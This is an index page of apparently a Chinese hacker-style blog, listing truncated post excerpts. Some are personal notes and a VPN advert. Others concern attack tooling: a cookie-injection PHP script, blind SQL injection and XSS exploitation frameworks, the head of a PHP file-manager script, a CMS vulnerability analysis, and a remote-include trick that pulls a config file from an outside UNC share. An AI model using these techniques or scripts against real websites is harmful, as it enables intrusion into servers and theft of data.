# Nig3h_Blog

摘要: <?php /*######################################################################### * / * * - >> SchramCookie Inject ver 1.0 * C0de by Nig3h -Greetz To All H3xIe Member. * link : xiaosan.cnblogs.com * ex : http://host/?url={$argv...阅读全文

摘要: Includes 1 GB of trafficAccess to Free serversLimited availability with possible waiting timesForced disconnection after 6 hours (redial possible)Bandwidth limited to 2 Mbpshttp://cyberghostvpn.com/en/product/purchase.html阅读全文

摘要: This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections.We reported bsqlbf when it first hit the net back in April 2006 with bsqlbf v1.1, then the v2.0 update in June 200阅读全文

摘要: The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, p阅读全文

摘要: 今天在写东西的时候, 突然冒出一个问题让我百思不得其解. 问题出在哪呢？ 让我一一道来. 首先我先访问编写好的一个页面, 然后我用浏览器打开源码一看. 在HTML 标签前面出现了N个换行符, 虽然这些不会在浏览器上表现出来, 但是让人觉的很不美观. 这到底怎么回事呢？刚开始我也不知道,我也认为可能是编码上的问题, 但是翻了几个引用的文件都找不出眉目。不能淡定之时, 我把引用的文件Ctrl+X全部给剪切掉. 终于被我发现了一个惊天的秘密... oh,my god 然来">" 后面有N个换行符...所以大家要养成良好的编码习惯, 以免给自己添加一些纠结的蛋疼的问题.阅读全文

摘要: 昨天, 就突然一下子打不开了. 我很郁闷, 想到最近网络站点内容审查, 会不会是这个原因呢? 想了又想得出的结论----又是天朝... 为了讨回我这小小守法的公民公道, 只好联系博客园的人, 在各种解释后. 今天打开mail, 收到一了一封博客启动 的邮件. 哈哈, 很激动. 感谢博客园的朋友们细心审核. baidu好,sina好.qqzone好, 封了让你直抓挠, 用博客就用博客园.阅读全文

摘要: 不经意间双眼望向窗外, 发现外面的一切是如此的安详, 是一个美丽的早晨. 马路上,车来车往. 阳光遍布着一栋栋楼房. 一切真美好Y.阅读全文

摘要: Easily search for exploits in BackTrack's exploitdb (files.csv).Highlights:Search the exploitdb archive Case sensitive & insensitive Change output mode Automaticlly copy your exploits Requirements: python (tested with python 2.7.1 and 2.5.2) local exploitdb (pre-installed on BackTrack Linux)阅读全文

摘要: 再次更新了下博客... 调来调去, X疼死了. 各位感觉怎么样? 另外最近不知怎么了,不喜欢睡觉...难道失眠了? 好了不说了, 睡觉。。累。。。阅读全文

摘要: ##Author : HeXie S3curity TeAm#Date : 2011.10.01##FIle : /image.php<?php/**#########################################* PHPCMS File Manager* Copyright (c) 2004-2006 phpcms.cn* Author: Longbill ( http://www.longbill.cn )* longbill.cn@gmail.com*#########################################*/$path = $_GET阅读全文

摘要: 精迅CMS（Jxcms）是基于采用网络中已经成熟、稳定的技术PHP+MYSQL开发而成，利用本系统您可以很方便地管理自己的网站。本系统是一款由文章模型、采集管理、广告系统、会员中心、友情链接、公告、单网页、数据备份还原等多个强大功能模块组合而成的强大、易用、扩展性强的开源网站管理软件。我们以精益求精的态度，追求卓越品质，为中小网站用户提供一套完美的迅速建站解决方案，我们在开发过程中无处不充分考虑用户的使用习惯，尽最大可能降低用户的使用门槛，让用户关注于内容维护本身，而不需要投入过多的时间来学习系统的使用技巧，在细节处下大工夫。Jxcms目前只有一个文章模型，但已有的功能模块都努力做到精益求..阅读全文

摘要: Author -> hExi3 Security TeAmTestEd On : IIS6.0+2k3分析过程 :\e\class\functions.php 2609行 ReUserjs 函数.function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir($addpath.$jsr['jsfilename']);//建目录 //取得js模板 $jstemptext=GetTheJstemp($jsr[jstempid]); //取出设置Js数组 $ret_r=ReturnReplaceLi阅读全文

摘要: 感谢各位的测试 , 下次再也不发垃圾脚本了，之前那个大家转走的都修正下吧 ,问题太多了. (几乎都没测试过)下面这个是我重新修改下的.<html><head><title>:: hExI3_Securi7y_TeAm...SCRIPT_FILENAME : <?=$_SERVER["PHP_SELF"]?></title><style type="text/css"> .font{ size : 2px; }</style></head><body>阅读全文

摘要: SESSION和COOKIE不同，COOKIE是存放在客户端的文件，而SESSION是存放在服务器上，同时也增强了安全性。如果一个 WEBSHELL的验证方式是SESSION，我们可以通过它检测出服务器的木马。 我的环境是IIS+PHP，在PHP.ini中，有这么个选项，session.gc_maxlifetime = 1440，也就是SESSION默 认到期的时间是24小时，如果客户端没做出反应，24小时后session文件就删除了，即使在客户端关闭了浏览器，它的session文件依然存在于 服务器上，php.ini中设置存放路径是session.save_path = "C:\W阅读全文

摘要: 建一个php文件，内容： <? include $path."config/config.inc.php" ?> 当前目录下建一个config文件夹，再在文件夹内建config.inc.php，就可以了。 访问http://xxx/xx.php?x=file:///\\ip\x$\xx\xyz xyz就是config文件夹所在的路径by: 乱雪阅读全文

摘要: 百度博客和博客园,都有自己的特色。不过相对而言,更喜欢博客园！强大语法高亮及技术专区,非常的赞！^-^阅读全文